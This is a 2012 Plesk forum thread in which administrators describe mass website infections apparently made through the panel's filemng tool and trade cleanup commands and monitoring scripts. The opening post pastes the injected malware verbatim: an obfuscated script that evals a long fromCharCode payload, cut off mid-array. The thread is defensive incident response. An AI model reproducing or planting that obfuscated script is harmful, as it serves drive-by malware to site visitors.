Security problem with filemng

Discussion in 'Parallels Plesk Panel 9.x for Linux Problems, Suggested Fixes, and How-To' started by galaxy, Jul 2, 2012.

  1. galaxy

    galaxy Kilo Poster

    Messages:
    176
    Hi,

    I've recently had dozens of sites hacked and malware inserted. But what was strange was all the files changed were still owned by the proper owners.

    I did find a file that didn't belong named "index.htm" that had the following contents:

    filemng: Error occured during /bin/cat command.<script>/*km0ae9gr6m*/window.eval(String.fromCharCode(115,61,34,34,59,116,114,121,123,113,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,112,34,41,59,113,46,97,112,112,101,110,100,67,104,105,108,100,40,34,49,50,51,34,43,110,41,59,125,99,97,116,99,104,40,113,119,41,123,104,61,45,48,49,54,47,55,59,116,114,121,123,97,61,112,114,111,116,111,116,121,112,101,59,125,99,97,116,99,104,40,122,120,99,41,123,101,61,119,105,110,100,111,119,91,34,101,34,43,34,118,97,34,43,34,108,34,93,59,110,61,34,50,48,52,46,51,53,49,46,52,52,48,46,52,57,53,46,50,51,50,46,51,49,53,46,52,52,52,46,53,53,48,46,54,52,46,51,51,48,46,52,48,52,46,54,48,48,46,50,51,50,46,50,52,54,46,51,56,56,46,53,53,48,46,50,48,48,46,51,51,51,46,52,51,54,46,51,57,48,46,50,51,52,46,51,50,55,46,51,57,50,46,53,48,53,46,50,50,56,46,49,50,48,46,49,54,52,46,54,49,53,46,50,54,46,51,48,46,49,50,56,46,49,54,48,46,54,52,46,57,54,46,52,55,50,46,52,56,53,46,50,50,56,46,57,54,46,52,49,54,46,53,50,53,46,54,52,46,49,56,51,46,49,50,56,46,53,56,48,46,50,48,56,46,51,49,53,46,52,54,48,46,50,51,48,46,50,51,48,46,51,48,51,46,52,48,52,46,53,48,48,46,54,52,46,49,52,49,46,49,50,56,46,53,56,48,46,50,48,56,46,51,49,53,46,52,54,48,46,50,51,48,46,49,54,50,46,49,55,55,46,53,50,46,53,48,46,54,52,46,57,54,46,49,50,56,46,49,54,48,46,50,51,54,46,50,57,49,46,52,53,54,46,49,54,48,46,50,49,54,46,51,51,51,46,49,50,56,46,51,48,53,46,54,52,46,51,52,56,46,52,49,54,46,53,50,53,46,50,51,48,46,49,51,56,46,52,54,48,46,53,48,53,46,50,48,50,46,51,48,48,46,49,50,56,46,49,56,53,46,54,52,46,51,52,56,46,52,49,54,46,53,50,53,46,50,51,48,46,49,51,56,46,51,50,52,46,50,57,53,46,50,54,46,51,48,46,49,50,56,46,49,54,48,46,54,52,46,57,54,46,52,55,50,46,52,56,53,46,50,50,56,46,57,54,46,52,54,52,46,53,48,53,46,50,51,48,46,51,52,56,46,49,50,56,46,51,48,53,46,54,52,46,51,52,56,46,52,49,54,46,53,50,53,46,50,51,48,46,49,51,56,46,50,54,48,46,49,54,48,46,56,52,46,57,54,46,52,51,50,46,53,53,53,46,54,52,46,49,51,53,46,49,50,56,46,53,56,48,46,50,48,56,46,51,49,53,46,52,54,48,46,50,51,48,46,49,54,52,46,57,54,46,49,54,56,46,49,54,48,46,50,48,56,46,51,49,53,46,50,51,54,46,54,53,46,50,48,46,57,54,46,49,50,56,46,49,54,48,46,54,52,46,51,49,53,46,52,48,56,46,50,48,48,46,50,51,50,46,51,48,51,46,52,54,48,46,53,56,48,46,54,52,46,49,56,54,46,49,50,56,46,50,52,48,46,56,50,46,51,54,57,46,53,50,46,53,48,46,54,52,46,57,54,46,49,50,56,46,49,54,48,46,54,52,46,57,54,46,49,50,56,46,49,54,48,46,50,51,50,46,51,49,50,46,52,50,48,46,53,55,53,46,57,50,46,51,52,53,46,52,48,52,46,53,48,53,46,50,48,48,46,57,54,46,50,52,52,46,49,54,48,46,50,51,50,46,51,48,51,46,52,54,48,46,53,56,48,46,49,49,56,46,51,57,46,52,48,46,49,54,48,46,54,52,46,57,54,46,49,50,56,46,54,50,53,46,54,52,46,51,48,51,46,52,51,50,46,53,55,53,46,50,48,50,46,57,54,46,52,57,50,46,54,53,46,50,48,46,57,54,46,49,50,56,46,49,54,48,46,54,52,46,57,54,46,49,50,56,46,49,54,48,46,54,52,46,51,52,56,46,52,49,54,46,53,50,53,46,50,51,48,46,49,51,56,46,52,54,48,46,53,48,53,46,50,48,50,46,51,48,48,46,49,50,56,46,51,48,53,46,54,52,46,51,52,56,46,52,48,52,46,53,55,53,46,50,51,50,46,57,54,46,49,55,50,46,49,54,48,46,50,51,50,46,51,49,50,46,52,50,48,46,53,55,53,46,57,50,46,50,51,49,46,50,51,54,46,54,53,46,50,48,46,57,54,46,49,50,56,46,49,54,48,46,54,52,46,51,55,53,46,53,50,46,53,48,46,54,52,46,57,54,46,49,50,56,46,49,54,48,46,50,50,56,46,51,48,51,46,52,54,52,46,53,56,53,46,50,50,56,46,51,51,48,46,49,50,56,46,50,48,48,46,50,51,50,46,51,49,50,46,52,50,48,46,53,55,53,46,57,50,46,51,52,53,46,52,48,52,46,53,48,53,46,50,48,48,46,57,54,46,49,54,56,46,49,54,48,46,50,51,50,46,51,49,50,46,52,50,48,46,53,55,53,46,57,50,46,51,51,51,46,52,52,48,46,53,48,53,46,49,53,56,46,51,53,52,46,52,48,52,46,53,55,48,46,49,53,52,46,49,50,51,46,50,51,54,46,54,53,46,50,48,46,51,55,53,46,53,50,46,53,48,46,50,54,46,51,48,46,52,48,56,46,53,56,53,46,50,50,48,46,50,57,55,46,52,54,52,46,53,50,53,46,50,50,50,46,51,51,48,46,49,50,56,46,52,49,48,46,49,57,52,46,51,51,48,46,52,48,48,46,53,53,53,46,50,49,56,46,50,51,52,46,52,54,56,46,53,52,53,46,49,57,54,46,51,48,51,46,52,53,54,46,51,53,53,46,50,48,50,46,51,51,48,46,52,48,52,46,53,55,48,46,49,57,52,46,51,52,56,46,52,52,52,46,53,55,48,46,56,48,46,51,53,49,46,52,52,48,46,53,50,53,46,50,52,48,46,49,50,51,46,52,57,50,46,54,53,46,50,48,46,57,54,46,49,50,56,46,49,54,48,46,54,52,46,51,53,52,46,51,56,56,46,53,55,48,46,54,52,46,51,48,48,46,49,50,56,46,51,48,53,46,54,52,46,51,51,48,46,52,48,52,46,53,57,53,46,54,52,46,50,48,52,46,51,56,56,46,53,56,48,46,50,48,50,46,49,50,48,46,52,54,56,46,53,53,48,46,50,49,48,46,51,54,48,46,49,54,56,46,50,52,53,46,57,54,46,49,52,52,46,49,57,50,46,50,48,53,46,49,49,56,46,51,57,46,52,48,46,49,54,48,46,54,52,46,57,54,46,49,50,56,46,53,57,48,46,49,57,52,46,51,52,50,46,49,50,56,46,53,55,53,46,54,52,46,49,56,51,46,49,50,56,46,53,48,48,46,57,50,46,51,48,57,46,52,48,52,46,53,56,48,46,49,52,52,46,51,51,51,46,52,54,56,46,53,55,48,46,50,51,48,46,49,50,48,46,49,54,52,46,49,54,48,46,49,50,52,46,57,54,46,49,57,54,46,50,53,48,46,54,52,46,49,56,57,46,49,50,56,46,50,52,53,46,54,52,46,49,55,52,46,49,50,56,46,50,52,48,46,49,49,56,46,51,57,46,52,48,46,49,54,48,46,54,52,46,57,54,46,49,50,56,46,53,56,48,46,50,48,56,46,51,49,53,46,52,54,48,46,50,51,48,46,50,51,48,46,51,48,51,46,52,48,52,46,53,48,48,46,54,52,46,49,56,51,46,49,50,56,46,50,53,48,46,49,48,50,46,49,53,54,46,50,49,50,46,50,55,48,46,49,49,48,46,49,54,56,46,50,50,56,46,50,52,48,46,57,56,46,57,54,46,49,55,50,46,49,54,48,46,56,48,46,51,48,48,46,49,56,52,46,53,49,53,46,50,48,50,46,51,52,56,46,51,48,56,46,53,53,53,46,50,50,48,46,51,52,56,46,52,49,54,46,50,48,48,46,56,50,46,57,54,46,49,54,56,46,49,54,48,46,57,54,46,51,54,48,46,50,56,48,46,51,53,48,46,49,52,48,46,50,49,48,46,50,56,48,46,51,53,48,46,56,50,46,57,54,46,49,55,50,46,49,54,48,46,56,48,46,51,48,48,46,49,56,52,46,53,49,53,46,50,48,50,46,51,52,56,46,50,55,50,46,52,56,53,46,50,51,50,46,51,48,51,46,49,54,48,46,50,48,53,46,54,52,46,49,50,54,46,49,50,56,46,50,52,48,46,50,52,48,46,50,49,48,46,50,56,48,46,51,53,48,46,49,52,48,46,49,50,51,46,49,55,50,46,49,54,48,46,56,48,46,50,51,49,46,51,56,56,46,53,56,48,46,50,48,56,46,49,51,56,46,52,53,54,46,53,53,53,46,50,51,52,46,51,51,48,46,52,48,48,46,50,48,48,46,50,51,48,46,57,54,46,49,54,56,46,49,54,48,46,57,54,46,51,54,48,46,50,56,48,46,51,53,48,46,49,52,48,46,49,50,51,46,49,54,52,46,50,57,53,46,50,54,46,51,48,46,49,50,56,46,49,54,48,46,54,52,46,57,54,46,52,54,52,46,53,50,48,46,50,49,48,46,51,52,53,46,49,56,52,46,51,50,53,46,54,52,46,49,56,51,46,49,50,56,46,50,54,48,46,49,49,50,46,49,53,48,46,50,50,48,46,50,52,53,46,49,49,56,46,51,57,46,52,48,46,49,54,48,46,54,52,46,57,54,46,49,50,56,46,53,56,48,46,50,48,56,46,51,49,53,46,52,54,48,46,50,51,48,46,49,53,52,46,57,54,46,50,52,52,46,49,54,48,46,49,48,48,46,49,52,55,46,50,48,56,46,50,55,53,46,49,48,52,46,49,54,56,46,50,4
  2. mikcanavan

    mikcanavan Bit Poster

    Messages:
    21
    Malicious code injection

    Ditto here - lots of different sites, some simple HTML some complex PHP/SQL sites. Maybe something to do with - http://jsunpack.jeek.org ???

    Range of files have been modified, all timestamped approx 14:00 GMT 02/July/2012. The only pattern seems to be that it is common file names, eg jquery.js / cycle.js / dropper.js / index.html

    Example of the code inserted at the end of the facebook.js file : http://pastebin.com/vfhz1ug1

    Would appreciate some feedback from the Plesk team, is this another vulnerability within the control panel?
  3. galaxy

    galaxy Kilo Poster

    Messages:
    176
    It looks like they got copies of peoples passwords.

    I was looking at /usr/local/psa/admin/logs/httpsd_access_log

    and see there's people attacking from all over (so they have a network of compromised hosts attacking) going in and changing files throughout the server and inserting malware on home pages and included javascript pages.

    I've spent all day today removing it from hundreds of domains...

    I've disabled file manager (renamed the binary/wrapper), but not sure that's going to stop it yet.
  4. mikcanavan

    mikcanavan Bit Poster

    Messages:
    21
    Yup - I have the same. Apologies Parallels team, compromised Client account, so all domains within client@5 were modified by the attacker.

    Changed the clients control panel password, will now keep an eye out for further access attempts.

    Info from my log for reference:

  5. galaxy

    galaxy Kilo Poster

    Messages:
    176
    It looks like most if not all of my clients where hacked. And they're going directly to each domains URL to get in. In the log I see each line as:

    123.45.67.89 domain1.com:8443 - ...
    111.22.33.44 domain2.com:8443 - ...
    ...

    I just renamed "filemng" in the /usr/local/psa/admin/bin directory until there's a fix.
  6. IgorG

    IgorG Parallels Team

    Messages:
    16,255
    Well. Some time ago we have published KB articles about this SQL injection vulnerability, method for fixing and script for mass password changing. All these actions should prevent negative consequences of this vulnerability. But there are two known problems still remains:

    - infected contents was deployed on Plesk server before applying all mentioned protection actions and still working;
    - some of users have changed their previous passwords (known for hackers) back after running script for mass password changing;

    Now you can determine and remove all infected .js (or something else) scripts with their known markers with something like:

    grep –r ‘km0ae9gr6m’ /var/www/vhosts

    or

    grep –r ‘qhk6sa6g1c’ /var/www/vhosts

    And you should apply fix and change passwords with mass password changing script if you still not performed these protection actions.
  7. DiogoR

    DiogoR Bit Poster

    Messages:
    13
    Plesk update.

    Hi.

    I have Plesk 9.3.

    Will the update to most up to date plesk solve this issue?

    Best Regards.
  8. IgorG

    IgorG Parallels Team

    Messages:
    16,255
    Did you read this KB article http://kb.parallels.com/en/113321 ?
  9. DiogoR

    DiogoR Bit Poster

    Messages:
    13
    When I did my last post I renamed the filemng file to prevent it's usage and tried to remove all infections I found.

    I'm now monitoring if they appear again.

    I've gone to the page you instructed, downloaded the "checker" and the result is:

    The patch has been successfully applied.

    Does this mean I'm safe and can rename back the filemng back to it's original name?

    Best Regards.
  10. galaxy

    galaxy Kilo Poster

    Messages:
    176
    I had patched the system for the vulnerability, but then recently (a few months ago), upgraded to 9.5.4. I also have a firewall blocking remote SQL on port 3306. They still got in apparently. I needed to stay in the 9.x realm because I have too many people reliant on the Sitebuilder and have been working to keep it and migrate the sitebuilder 4.5 to another VPS.
  11. IgorG

    IgorG Parallels Team

    Messages:
    16,255
    Did you change all passwords with corresponding script too?
  12. Squeeb

    Squeeb New Member

    Messages:
    18
    our systems have also been plagued by this attack.

    It's in jquery's and index.html's all over the servers.

    Can you confirm this *is* a vulnerability within the plesk admin section?
  13. Squeeb

    Squeeb New Member

    Messages:
    18
    Seems funny that this attack only just happened to everybody aswell.
  14. corncrake

    corncrake Bit Poster

    Messages:
    3
    Ok just registered so I could add to this - exact same hack attempt here.

    If its already happened - here's some tips.

    Find the files that have been modified in the past day within vhost, try -
    Code:
    find /var/www/vhosts \( -name "*.js" -o -name "*.php" -o -name "index.*" -o -name "default.*" \) -ctime -1
    
    Then if you want to remove the string based on the code shown by the OP at the start you could use (make a backup if your concerned about the replacements effect!) -
    Code:
    find /var/www/vhosts \( -name "*.js" -o -name "*.php" -o -name "index.*" -o -name "default.*" \) -ctime -1 -exec sed -i 's/km0ae9gr6m[^>]*qhk6sa6g1c/youreplacementtexthere/g' {} \;
    
    OK, now that the files are clean check the system again for the injected script -
    Code:
    grep -H km0ae9gr6m /var/www/vhosts/* -R | cut -d: -f1
    
    this will just display the files found with the string used at the start of the injected code.

    Hopefully it finds no files

    So what else could be done -

    Rename the plesk filemanager as mentioned above.

    Additionally and to check when next time your files are changed -

    Setup a simple cron script to check to let you know when files are modified. I use find again but you could use inotify.

    So let's check every 5 min for files that have changed in the last 10 min in vhosts, and send a warning email when this happens (not ideally for servers with 50+ sites but for smaller sets or just to check a specific site, it's good) -

    Code:
    #!/bin/bash
    # init
    fts=$(find /var/www/vhosts \( -name "*.js" -o -name "*.php" -o -name "index.*" -o -name "default.*" \) -cmin -10)
    if [ "$fts" ]; then
    echo "$fts" | mail -s "Files where modified $(date +%Y-%m-%d-%r)" your@email.com;
    else
    :
    fi
    
    save this as a script and set it up as a cron job to run every 5 min.

    Finally, if you feel the VPS is compromised and your are paranoid about further attacks - migrate to a new one

    Hope this info is of help and saves some time for others
    Last edited: Jul 4, 2012
  15. Squeeb

    Squeeb New Member

    Messages:
    18
    Heh,
    Nice post :D

    Nice to see us sysadmins thinking alike. Cleaned 100 files so far using the methods above (well, similar methods)
  16. corncrake

    corncrake Bit Poster

    Messages:
    3
    Thanks, any improvements (especially on the sed) let me know, i'm ad-libbing :)

    Another possible point is to see if you can restrict plesk control panel to your ip or at least the port.
  17. Squeeb

    Squeeb New Member

    Messages:
    18
  18. HornWijaya

    HornWijaya New Member

    Messages:
    1
    Here's the perl command line

    Got infected
    System went for upgrade from 9.5.1 to 9.5.4, 5 hours of downtime due to stupid mail_restore (keep rsync -aq the whatever) (lost a few clients along the way) Alas... problem persists.

    grep -R km0ae9gr6m /var/www/vhosts
    get the filenames
    perl -pi -e 'BEGIN{undef $/;} s/\/\*km0ae9gr6m.*qhk6sa6g1c\*\///smg' FILENAME

    I have been running this for days until I gave up (9.5.4 plesk btw), I have just renamed the filemng.

    Was in Super old Ensim in FC1 for many many years, and never have such issue and it's even more secure with its super chroot environment.

    Hope the command line helps.

    Cheers.
  19. SFMAdmin

    SFMAdmin New Member

    Messages:
    8
    Can Parallels confirm if this is a security issue that will be addressed by a micro update?
    It seems very strange that (a, this exploit didn't arise until July the 2nd and (b that this has anything to do with the previous exploit.

    This looks to me like the micro patches were not affective.
  20. AlexandreS

    AlexandreS New Member

    Messages:
    19
    Same here, and the fix was already applied (KB 113424):

    > php -d safe_mode=0 plesk_remote_vulnerability_checker.php
    The patch has been successfully applied.

Share This Page